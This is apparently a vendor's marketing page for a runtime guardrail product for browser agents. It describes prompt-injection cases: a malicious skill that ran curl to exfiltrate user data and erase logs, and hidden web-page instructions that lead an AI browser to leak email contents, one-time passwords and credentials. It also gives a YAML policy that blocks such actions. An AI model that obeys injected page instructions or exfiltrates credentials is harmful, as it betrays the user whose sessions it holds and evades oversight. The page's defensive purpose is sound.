Use Cases/Browser Agents

A malicious skill ran curl and exfiltrated your data. The agent never asked.

Browser agents navigate pages, fill forms, extract data, and execute scripts with your authenticated sessions. Veto intercepts every action before execution, enforcing URL allowlists, form field protection, and credential access controls that the agent cannot bypass.

URL allowlistingData exfiltration preventionCredential protection
Start freeAll use cases

Cisco proved this attack works

In late 2025, Cisco's AI Defense team tested OpenClaw, a viral AI agent framework with 60,000 GitHub stars. A malicious third-party skill executed curl commands that sent user data to an external server, then erased the logs. The skill achieved this through prompt injection that bypassed the agent's safety guidelines. Cisco surfaced nine vulnerabilities — two critical, five high severity. OpenAI's CISO later acknowledged that prompt injection in browser agents "is unlikely to ever be fully solved."

Why browser agents are the highest-risk surface

Browser agents have direct access to your authenticated sessions, can see everything on screen, and can interact with any website you can. Researchers have demonstrated that hidden instructions on a web page can command an AI browser to extract a user's email, retrieve a one-time password from Gmail, and post credentials to an attacker's server — all without traditional malicious code. In February 2025, Johann Rehberger demonstrated Zero-Interaction Exfiltration: hidden instructions on a GitHub page commanded an AI to leak private data without any user input. CVE-2025-47241 in a widely-used browser automation library affected over 1,500 AI projects by allowing attackers to bypass security whitelists.

Credential theft

Agents read password fields, access session cookies, and extract API keys. Malicious skills silently exfiltrate credentials via curl and erase logs.

Data exfiltration

Agents scrape dashboards, customer records, and internal tools. Prompt injection on any visited page can trigger silent data transfer to attacker-controlled servers.

Unauthorized actions

Agents submit forms without approval — making purchases, sending emails, or modifying critical settings. Hidden page instructions can trigger these actions.

Screenshot exposure

Agents capture screenshots of sensitive screens exposing PII, financial data, or confidential business information to unauthorized parties.

URL allowlisting and blocklisting policies

Define exactly where your browser agent can navigate. Allowlist approved business tools, block sensitive domains, and require human approval for unknown sites. Unlike prompt-based restrictions, these policies are enforced at runtime and cannot be overridden by injection.

veto/policies/browser.yamlyaml
policies:
  # Allow navigation to approved business tools only
  - name: "Allow business tools"
    match:
      tool: "navigate"
      arguments:
        url: "^https://(crm|docs|slack)\.company\.com/.*$"
    action: allow

  # Block data exfiltration vectors
  - name: "Block outbound data transfer"
    match:
      tool: "execute_script"
      arguments:
        code: "(curl|wget|fetch|XMLHttpRequest|navigator\.sendBeacon).*"
    action: deny
    response:
      error: "Outbound data transfer is not permitted"

  # Block financial and email sites
  - name: "Block sensitive domains"
    match:
      tool: "navigate"
      arguments:
        url: "^https?://(bank|paypal|gmail|outlook)\..*"
    action: deny
    response:
      error: "Navigation to sensitive domains is blocked"

  # Protect password and payment fields
  - name: "Block sensitive field interaction"
    match:
      tool: "fill_form"
      arguments:
        field_type: "(password|credit-card|ssn)"
    action: deny
    response:
      error: "Interaction with sensitive form fields is blocked"

  # Require approval for form submissions
  - name: "Approve destructive form submissions"
    match:
      tool: "submit_form"
      arguments:
        action_url: ".*(payment|checkout|delete|settings).*"
    action: require_approval
    approval:
      timeout_minutes: 15
      channels: [slack]

  # Default: require approval for unknown domains
  - name: "Approve unknown navigation"
    match:
      tool: "navigate"
    action: require_approval
    approval:
      timeout_minutes: 10
      reason: "Navigation to unrecognized domain"

How Veto stops prompt injection attacks

Prompt injection is the fundamental vulnerability of browser agents. Attackers embed instructions in web page content that the agent processes as commands. Veto operates outside the agent's context window, so injected instructions cannot modify or bypass policies.

Domain-level enforcement

Even if a prompt injection convinces the agent to navigate to a malicious site, Veto blocks the navigation at the tool-call level. The agent receives a policy denial, not a prompt instruction. It cannot reason its way around it.

Script execution control

Block curl, wget, fetch, and WebSocket connections to unknown endpoints. Even if the agent is tricked into executing an exfiltration script, Veto intercepts the tool call and denies it before execution.

Form field protection

Prevent agents from reading or writing to password, credit card, and SSN fields regardless of what instructions appear in the page content. Require approval for form submissions to payment or deletion endpoints.

Credential isolation

Block access to stored credentials, session tokens, and browser cookies. Agents operate with the minimum session access needed. All credential-related attempts are logged for audit.

Common browser agent policies

Domain allowlisting

Default-deny navigation. Only explicitly approved domains are accessible. Unknown domains require human approval before the agent can proceed.

Sensitive path blocking

Block admin panels, settings pages, and deletion endpoints even on allowlisted domains. Granular path-level control per domain.

Form submission approval

Require human approval for any form that creates, modifies, or deletes data. Allow read-only form interactions without approval.

Screenshot redaction

Block screenshots on PII-containing pages. Auto-redact credit card numbers, emails, and account data from captured images.

Credential access logging

Log and alert on any attempt to access password fields, session cookies, or credential manager data. Block extraction entirely.

Script execution control

Block eval, prevent WebSocket connections to unknown endpoints, and deny all outbound data transfer commands (curl, fetch, sendBeacon).

Browser agent integrations

Browser Use Integration

Guardrails for Browser Use agents with URL control and form protection

Playwright Integration

Authorization for Playwright automation scripts and agents

Related resources

AI Agent Guardrails

Core concepts and implementation guide

DevOps Agents

Shell command filtering, infrastructure controls

All Integrations

SDK and framework integrations

Frequently asked questions

How does Veto prevent data exfiltration from browser agents?
Veto intercepts every tool call before execution, including script execution, network requests, and navigation. Outbound data transfer commands like curl, fetch, and sendBeacon are blocked at the policy level. Even if a prompt injection convinces the agent to exfiltrate data, the tool call is denied before it runs. This is the same attack vector Cisco demonstrated against OpenClaw.
Can prompt injection bypass Veto's browser agent guardrails?
No. Veto operates outside the agent's context window. Policies are evaluated at the tool-call level, not the prompt level. A prompt injection can change what the agent wants to do, but it cannot change what Veto allows the agent to do. This is the fundamental difference between prompt-based guardrails and runtime authorization.
Can I allow browser agents to access only specific pages on a domain?
Yes. Veto policies support regex URL matching. You can allowlist specific paths (e.g., crm.company.com/leads/*) while blocking others (e.g., crm.company.com/admin/*) on the same domain. This provides page-level access control within a single domain.
How do approval workflows work for browser agent actions?
When a browser agent attempts an action requiring approval, Veto pauses execution and sends a notification via Slack, email, or your preferred channel. Reviewers approve or deny from their dashboard. Approved actions resume automatically. Denied actions return an error to the agent.
Do browser agent guardrails affect performance?
Policy evaluation happens locally in under 10ms. Network latency only applies to approval workflows and cloud-based audit logging. The agent operates normally while guardrails evaluate each action in real-time.

Your browser agent has your session cookies.

Make sure it only does what you authorized.

Start freeRead the docsTalk to us